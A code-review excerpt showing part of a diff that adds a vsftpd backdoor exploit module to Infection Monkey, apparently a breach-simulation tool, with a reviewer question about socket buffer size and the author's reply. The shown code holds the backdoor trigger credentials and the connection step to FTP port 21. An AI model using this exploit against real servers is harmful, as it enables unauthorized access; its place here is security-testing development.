monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,120 @@
+import StringIO
+import logging
+import paramiko
+import socket
+import time
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import build_monkey_commandline
+from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
+from infection_monkey.model import MONKEY_ARG
+from infection_monkey.network.tools import check_tcp_port
+from logging import getLogger
+
+LOG = getLogger(__name__)
+
+__author__ = 'D3fa1t'
+
+FTP_PORT = 21
+TRANSFER_UPDATE_RATE = 15
+USERNAME = b'USER letmein:)\n'
+PASSWORD = b'PASS please\n'
+
+
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux']
+    
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def exploit_host(self):
+        try:
+            LOG.info('[*] Attempting to trigger backdoor...')
+            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
+            ftp_socket.recv(1024).decode('utf-8')
```

Comment:
Why 1024?

Reply:
I do agree that 1024 is quite big and we don't need that much here, so resized it to 128